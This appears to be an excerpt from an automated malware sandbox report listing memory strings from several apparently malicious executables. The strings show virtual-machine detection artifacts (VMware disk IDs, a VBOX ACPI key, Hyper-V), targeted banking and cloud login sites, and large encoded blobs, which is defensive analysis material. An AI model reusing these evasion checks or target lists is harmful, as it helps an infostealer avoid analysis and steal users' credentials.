                          Source: I2jCDr35mu.exe, 00000000.00000003.2258962424.0000000005C95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT087cq/n0b4cx5g+QK3FvYl+MX6lBiIKAgvXttf1DH+989/DfjSv6Bq3DYuxcAa55qtt7c5CvCG+LwRguGiK4StuVCVc6XgB5WXXwqsj3qDuW4Cf/pUPGulNsSUbVjnJXLSDRa6CR/hKQBmFkJLHQQsYPMFLA0wE+qP3/8dP8jfiPM3Ft4I0gGtrBhve6DpxPdSGSe6LyTLaksmvPj6AByWNap2XijrDgRIkyxnvOenLXHtAupwODCcM8S8KwJktambXH7du0NQvoKDbZnzDWV9XluhgbnLCK/NOuMauHTKJlXFKh4UcM2Nd34B1ruTNoazRsc2VUyvcK0LuDb25m1UYYMsXMBYBeS95xZmIu0Mjueg/abgcwHkROSgEsMCUZwAidB1CX96+giihcXq1JOPZpqawYXgXQSmbf1UUBHCa+KhAhsGPEmo2b2WlIsP+SG8/MNLfBqrpOYMBxJxQOpx9ZnUwE97DqoY/nhJYSwwTgEyYc8bddtrewuzAB+9DfpEpTdfQT/cxR8AMzo9KKn5+oPbgH+UVm/AagvIhYJqEfRMxf5ABhyQsPtNJNladC+rIsDHZYhNYNA8Cs9pW+PZgATFXFTpdCoCBk2mA6zaYBYbwI1xlSuCtGPU/Rbd34BVMWyoS5uIDM+nfN4qG8NY6ugTd4qX4ZPRQ8d92ROotox3W+cbhjJ0UBXIO/SH3iagkaPKm2TR01+OMarxDkQf+hHBQ98UfTZge+UFl/DF/WSFYRV96ZXXwEMtsIWiJXSuH/iW/L5FNWzZJaPpTqrBleGkVFGXkVYLj6jsnkDuew56AWPnJ22VSfrESy8aJKTCO27VEHSVPJdl8AJQfOAbEtPWbXFtRvjZFNI9XoaaTYDjUrZsv9ruQWYofdQcvnl8RCl+hHQiO0ZRuJxFlb0PmX0WJeID100wGgStEsmy1hYFYDby1j1jz30plwP67QanQ8d8IgM7UJ1K+Ebj+Ib/Y1MaVoAe3E4vo4SSTPjtJlWgiB7iey44K8v3hQpEWyYRV7DPKo2bFqJL8LOq9uHVY8oaTTmTOvDKfLlApDIr8s7C13s+fEqozzwdJIyNFpQpwgZTX/g+HlyqNvjqAsy29X5pUV9au598WqMToJ3A/lfJ0gIYEBOlNrjd4kzwIB4hXwtgj1m5F0CsblnjVpyOSytDBOX97qCqsKm9L8JK9FJlFyllzgrYgc3+KKblk6G4EOmgeGzpq4RnZ6w6AE2TfEOvWwAWUpC2JngPArdsFA2jDBCKYcs3tnSK492W7W/pBKUjPkQ11JO4AGfA4JMnH4NRe2W4lQXPC1jXfoPtLEBMMqTbNkgvwIGaQX1egEo4Dfc0NGpdDJHT8FY4UCps+N+aMboGNn/b66ibzJRWbXkrfPHzpLMR87/SoPzPKjiTcLyz0/Oz539pymXYX/I3f/z8xQs+q6Uhctc5SsGrWh+V/Pjjxy/t6Y9EiT0F+ouAMfIgfQrwUu49Muxu+B0GWdOoKIM8ezNrgWFPHwEw75kj1Cti8NNHWCN/hBFWYs0Il7ESnUW6zlWVYHOUR4ILN2FBlbBaCmetEhG9a/yUvEKRQ0cVGDyfVSqzNO45uuj8Yb8QL4Rcn9/WLlmZiQI9lOaHLyjiQzEWVgpiyK06CpNwwP+5ehla52OA37zstAxXsJqQqgn44fdAf/5yoIlkfPXh3n/xwT82wkp+eEBDf8Qt//l+x9NvH5Dfr2NVL7+/GKQyeB162MRgnMcglWeGJN300k43voRGl9/XfbMLO9A6doi6vAM8Bi1MUoZYwLanAaL2tYOdr6lHyxCUKCJ0yAquQ1A7NXDfWLVKqS6BMSYOXtaqO3UBwoMArdgT1KVLWKlqBZqP90BHNuSKJcCgYWO+cFpnG+6l3ZL6F6CS6PBPs6FwXUI97phbgPFK7fAvoYzZgQCjI9eeFEo2q3lPRrLp+2G0cn58lMl040DZ85XiPupOmfWw7SXQwbsaVNknL3UC6R0B4nFX8CXQvYvxydNQAwQfs6ysJx48GeB3ikF8IigQDlDDzYGPsLV1BW0B
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                          Source: MPGPH131.exe, 00000007.00000003.2262988892.0000000006314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pageformVMware20,11696487552
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                          Source: MPGPH131.exe, 00000006.00000003.2506172514.0000000001422000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}83teX9h\JX0OQi4nZtiqLogin Data For Account-journal
                          Source: MPGPH131.exe, 00000007.00000003.2262988892.0000000006314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rootpagecomVMware20,11696487552o
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                          Source: I2jCDr35mu.exe, 00000000.00000003.2224303335.0000000005CE4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ebrokers.co.inVMware20,11696487552d
                          Source: MPGPH131.exe, 00000007.00000003.2262988892.0000000006314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,11696487552
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                          Source: MPGPH131.exe, 00000006.00000002.3345445002.00000000013E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx*B
                          Source: MPGPH131.exe, 00000007.00000003.2262988892.0000000006314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tive Brokers - non-EU EuropeVMware20,11696487552
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                          Source: I2jCDr35mu.exe, 00000000.00000003.2224303335.0000000005CE4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .utiitsl.comVMware20,1169648755
                          Source: I2jCDr35mu.exe, 00000000.00000003.2254508550.0000000005C61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bM5c3YRODtzXlizVX/mAitADqNeW5oaJtWpjpinGWLCK8urG3jKNN0mmupGvcU5HlXybvdFUXWgqEhdpkMfvjkkaEbCSfMYSxkL4HWyoXAB1G5hDlqeMuUnwoUAFmVChtHrzZUujZ1qMtmQuVsgyJgRjoLosLTOWYnCQQNUD+mHRChOMZhQemhTYAQZgYPXrgAlY7arGVNjsQrU1hANJXXgrvFAvKP9iwWKe4wjrnFHs+Z6nrkdzDfsQ7pfwBivJDdeBjyC8ZBrYMHeatMrX4SJ1l2vEDg/GZZwN3qvaQEOk1nsYI0nQhADMY/hZsIxYmq3ilFF3yHgGzY6tEzFmBea/UBzFhAmYb1oqHrA2HYnHoIDc0qDg5jN/iSm+UGwHYbQqqkRJVpdhCsWfEsDQs2YatlmgMvGsygRH9PIZM241n1Wg2QJriGdD15v8AEBGUz5wmlUAhSdeuRka5XGneIZTmGpDHsAMQJpeyqP8xYFGCRUAjTnqs8pnAw7ZfJaRM+v+EFLwrtaPnqkMBbgxavDBYWANPixOUg4B+VzjJUjJYCBsUJclzNAchyM4pexDM02OhsoxyzrVD0C6Arsg91oEjxRVPKLcNQkNKVbxTCUW6soC2egIZoCPA7t4NFXTGOgK4Ztqmq9iAIBoyJ0taxTdWMw6zUbRFVnX0UrMS8+qbjpa49lGwqehC3MjgPLqrkBUFpyDPwpFUfupRlk6QW9NIcWAwPgjCgxdK6okaC1DF0K1ohFZDl5jASmKR3itQzUXpUraHaACX6vQ/9XAsTV4DSBo7dk3QZrlT5uo4dswPOpnsJUzg7nmNYtWoEgESZWcUTH2xOwuFIKgJgfVnHTK+JLmAb/RowJPMKhAsCv3xIKp3A3J0bIrT6Kneikg7dvk+GJmkHFttaJEguSLSv129ueZxPU8u/jjbOh58SbK79gHC6fbyHtiXugGa2piEQXxG+bmG0Cus4t/nq2zXfIR5aooh8B19rBJQYmQ20FEfz4uFqfTRmf/+lM6Ex746uEtS7v0ouFUMm83c8HpZ5PQzRdxuv47EQAZ9PEP/ZL6ecyVbL+8hOSJm6+yF+1A6ySN83i+WdwHy5TP6AGa54yNOQDMt0K/OHXfg+kqThLIfk6QFsLDCjZdpZTGOzjUsCOwZe5C6Gi8Q8TVSedBLpSfsvQj8BDp18kmZ3ex54YP0+Gs0yuOc0oHyahpuklKSN9DNVuBZhWH/uMHS1PAuQ5a2Lju9F/SWeKm7prBc0jVP84iPJxdnHVJ/HDDDbXL54Z89qdU0Vcin6gqmwXrJjGgP4IA8IR19qewIwTnUCQdrTZp1GW0u9j1R6sUgPUrm2c5cvXl9oot3E2Yi+lA6TVxs+wzTv0RyoJlnAb/LVyrQ+JXXkt08JQiqZojt7zmAq6A6TMAI3d99XjZOb1H2Ej05cPkbrRi3jsQ/1cA/+FiEaSdYURoSjyCbui7SR58sFKCEAn3HKH4uwm3eDW6eeqSVnn3vRu5S+ZPUrZgKYs8lgl1/fYieGCfbdnVWn1in27qZ19Yfhv4WKpf3SAPgywfR4sYK3wdc8VGoHmK3TWFL5jmOUHB49Ogy2jYoedRvh3h9D96fGhUBv0WbVKW3Fxq4ViXVL2x9NKNgA+vC8A5zUncE8H2TafulfEOSRqFccYu86ht5uc0nLgpiCrzoulmnAYZLfk4zbvX51WQrYMsc8ORmzRWmqqLFXZVINxxVKaxrpheUhYRfRx54cZnzZZxdMOYT0VhpWbZdIcVFHnb3QBFJEgxwyQpCTte0yQjzn7uCUZs
                          Source: I2jCDr35mu.exe, 00000000.00000003.2224303335.0000000005CE4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s.portal.azure.comVMware20,11696487552
                          Source: MPGPH131.exe, 00000007.00000003.2262988892.0000000006314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,116964878
                          Source: MPGPH131.exe, 00000006.00000003.2506172514.0000000001485000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_5E024E9Brs
                          Source: MPGPH131.exe, 00000006.00000003.2299429260.00000000062B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 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
                          Source: I2jCDr35mu.exe, 00000000.00000003.2260665171.0000000005C9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_5E024E9Bmp3
                          Source: I2jCDr35mu.exe, I2jCDr35mu.exe, 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, MPGPH131.exe, 00000006.00000002.3334513200.0000000000CB8000.00000040.00000001.01000000.00000005.sdmp, MPGPH131.exe, 00000007.00000002.3207735109.0000000000CB8000.00000040.00000001.01000000.00000005.sdmp, RageMP131.exe, 00000008.00000002.2346616566.0000000000618000.00000040.00000001.01000000.00000006.sdmp, RageMP131.exe, 0000000F.00000002.2633807221.0000000000618000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                          Source: RageMP131.exe, 0000000F.00000002.2653472132.000000000107B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
                          Source: I2jCDr35mu.exe, 00000000.00000002.2713747827.0000000000F2D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?\#disk&ven_vmware&prouask#4&1656f219&0&0000f5-b6bf-11d0-94f2-00a08b
                          Source: RageMP131.exe, 00000008.00000002.2348896426.0000000000F00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                          Source: RageMP131.exe, 0000000F.00000002.2653472132.00000000010AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: MPGPH131.exe, 00000007.00000003.2262988892.0000000006314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,116
                          Source: I2jCDr35mu.exe, 00000000.00000003.2224303335.0000000005CE4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .comVMware20,11696487
                          Source: MPGPH131.exe, 00000007.00000003.2262988892.0000000006314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487550
                          Source: I2jCDr35mu.exe, 00000000.00000002.2713747827.0000000000F21000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000s\user\AppData\Local\Temp%
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                          Source: RageMP131.exe, 00000008.00000002.2348896426.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_5E024E9Be
                          Source: MPGPH131.exe, 00000007.00000002.3220691052.0000000001491000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW!
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                          Source: RageMP131.exe, 00000008.00000002.2348896426.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_5E024E9B
                          Source: I2jCDr35mu.exe, 00000000.00000003.2224303335.0000000005CE4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696$
                          Source: RageMP131.exe, 00000008.00000002.2348896426.0000000000F3B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX9
                          Source: MPGPH131.exe, 00000007.00000003.2290339339.000000000151F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                          Source: MPGPH131.exe, 00000006.00000003.2303798310.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2298750009.00000000062C1000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2303282436.00000000062C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: H4sIAAAAAAAAAN1ca2/juJL9K4t8HTmj9yMX+8Fxko5n8vDETvruvX0RyBJtK5EljSQn7R3Mf99TpJ62JbtngcXFAoOeSKwqFovFqlMk5T/ORnG0CJbjq+zs4uyPb2fXo+m3s4tvZ5PB00CRbdWw5IEyUBRpMrga6Kpm2wN1YH47k0DqL1lB+3dQqLKsaGhUZKl4YRi2BmateFY02zHxbIhn2dY1E60Ds3h2FFs3IcAoGGTLcNAdRBQUIJEVg/ovCXRTUepndOmYat2jrNqqBuWNgaGWfVqqYuH/A7XSSjYMFTLKZ4wZnSoDq3yWLctBu1VqqSoq0Tvls2kackMH2VC0hk6yY6kauAdK1YEOJdCBUz5rjqnXCsiOI9ty3S7bjmWQ0fkccAYVJE2NYXm7oaGpGZZBZqsZFINmRi/NhkE1JoKGaDoNszmOabSeDdNsdoAhqa2JxMTaA32gVAQwqd4QAI0UvWkTXdZhkfoZE6U0TaBamt16Vgy7Kc+2bWdgVDaVbdMg11EGdjlGh/5rjBlWtPTGGGxHNbizVc+K4jRUVDSTT3vVbplmc1ptQzHMhkq26tgGqaRUL+CemIWyQ90yoB9UqAgwD2rDipajW1qjB902uTNXg7QsQ2sxWAq3YukomCXHGWjQSrFLQ1myYjesoGsa962KwFIMp+UakCJDy6odhtAaM2XJMqa+HpVhGlpTBxNKtWbKVFWnXk2yIcO0TXrFkVXy1YpAk83mIA1b0dWmADin2Ry0amE1qdpAr8eo0kxiMuSSRsf0NpQyVNXQyV9LAsQESKgDDWxvI+5plRl0mqyGVphMRWs8q6am0mSrpUR0YjkNNeEv5G7awCnfaJaJwFQPjJtiAJ5SpmbKttIMZpYu80BSdSqT7Rsuq+o8GtZ9WpgqUKjFMBRL1uXGutdkzajoHcuBUZyBXTwqKixgDQxyV54KHBvuiWWsly+og4Ep/POJh2vbgHq2cPEnsU5NpTT0E7eb7hgDW4yBv9DhxgOKJnbxBmnBgRS1lGtbWAgU/kzxaGoyOahRPGoy5RS4kFALDm+SUrolLecKY4quXOi6Zcu6pL3Jy6Vumhe6ptiWJaUsY/k8iJZEIJuy5CmBjUiiXuiqqUPlzySOMjdXXw0ZJOQE0tubykzHhgxVtWxFchxjpSH0oB0Ly5Qc/22OWXDQhwVrS/OFt7Rs1cIzQpwp5c7vqRsFazcP4oit3SB0N3m8CMIQFI7hKBIWmEYBmHo0TEVic19bKhaNwjAR3fJkEMaks+aAVJrLylug2cYF9Y8OAmWpLk1ZJwU0w5GcxYItHRoTsgYWBNMsF2tKJXrbBj/G763c/PcNSwOWvRqvwTqBZTLo9/oZ5KvXlPlByrz8dZOGGcQgucCWvqvNNT5O3VEcyTdt31cd6tZQHZiOzQcZC8E22ETZKkgudAP+oUn2G+KcQQbBErMtKVCZBX1tsjmSu2SuFLZCAqXhI9FKzFE906Z2Be2GpMiub+uyTB2beHZ83XMdHeNHIAN/4LMoDxZbf05vsAqlTzcMWZ5kn2EQvW8S382ZMJYjBW++Y1oatCZgYUqKp9u6TaNSIF2TEDvtQNfQGaUsS7L0JVKfbZGyWA+S5rE3OIx9oWGlORaMqS90h6xgIArp0pvuywtTd7hyCA1zsj5AzYXmAOlYkuN5JpKphnYFwV7y48/ITdP4M/PSOAzJ/HkaLJcsjdjnhQbDyaoUAa+FMRwoWhJBvMnzeLkMaVCYG1NaWHN/aSrkxVjgiuRb9tsS8Q4WhQcbkim7iMoyOZgJl5OYrQOnOTSVgGNwOB/E3uIC6RH4THKNpfamWGBHPLBt6Lhm3xM34g7ygXlCorNUKYPh8ZZ5braau967FwbeO5o1pHIsdubrKoaNNYEeMvcDymdblm2CC0Q5VXMkOQgYohlMadka/PhNe/MD3YKpEXhNQ4LhdYiADEA6OJjsMUXFJKIDUh4dyJpiEbehY8xIhAvThNKKRcv0Q3mFBaMYnhF4fO1h6ZMFsw1XStckRVu+LYDkoBAWriOp3mrhmjo9a+gZHWRMVWxqhmGkwPDYyjKMCw0Og3WVeEka+xsvn29TtmTfWbTJ0IYJkyXVZTogEvk0Ug/cTvdVBjxCPm0bNBY/sA3VxFhkhdzQsFcLBz6uGXB1DV0nbobJw9jhNYa0gG/En+48ZFhmCFIXmuZoqiopbM5c3YRODtzXlizVX/mAitADqNeW5oaJtWpjpinGWLCK8urG3jKNN0mmupGvcU5HlXybvdFUXWgqEhdpkMfvjkkaEbCSfMYSxkL4HWyoXAB1G5hDlqeMuUnwoUAFmVChtHrzZUujZ1qMtmQuVsgyJgRjoLosLTOWYnCQQNUD+mHRChOMZhQemhTYAQZgYPXrgAlY7arGVNjsQrU1hANJXXgrvFAvKP9iwWKe4wjrnFHs+Z6nrkdzDfsQ7pfwBivJDdeBjyC8ZBrYMHeatMrX4SJ1l2vEDg/GZZwN3qvaQEOk1nsYI0nQhADMY/hZsIxYmq3ilFF3yHgGzY6tEzFmBea/UBzFhAmYb1oqHrA2HYnHoIDc0qDg5jN/iSm+UGwHYbQqqkRJVpdhCsWfEsDQs2YatlmgMvGsygRH9PIZM241n1Wg2QJriGdD15v8AEBGUz5wmlUAhSdeuRka5XGneIZTmGpDHsAMQJpeyqP8xYFGCRUAjTnqs8pnAw7ZfJaRM+v+EFLwrtaPnqkMBbgxavDBYWANPixOUg4B+VzjJUjJYCBsUJclzNAchyM4pexDM02OhsoxyzrVD0C6Arsg91oEjxRVPKLcNQkNKVbxTCUW6soC2egIZoCPA7t4NFXTGOgK4Ztqmq9iAIBoyJ0taxTdWMw6zUbRFVnX0UrMS8+qbjpa49lGwqehC3MjgPLqrkBUFpyDPwpFUfupRlk6QW9NIcWAwPgjCgxdK6okaC1DF0K1ohFZDl5jASmKR3itQzUXpUraHaAC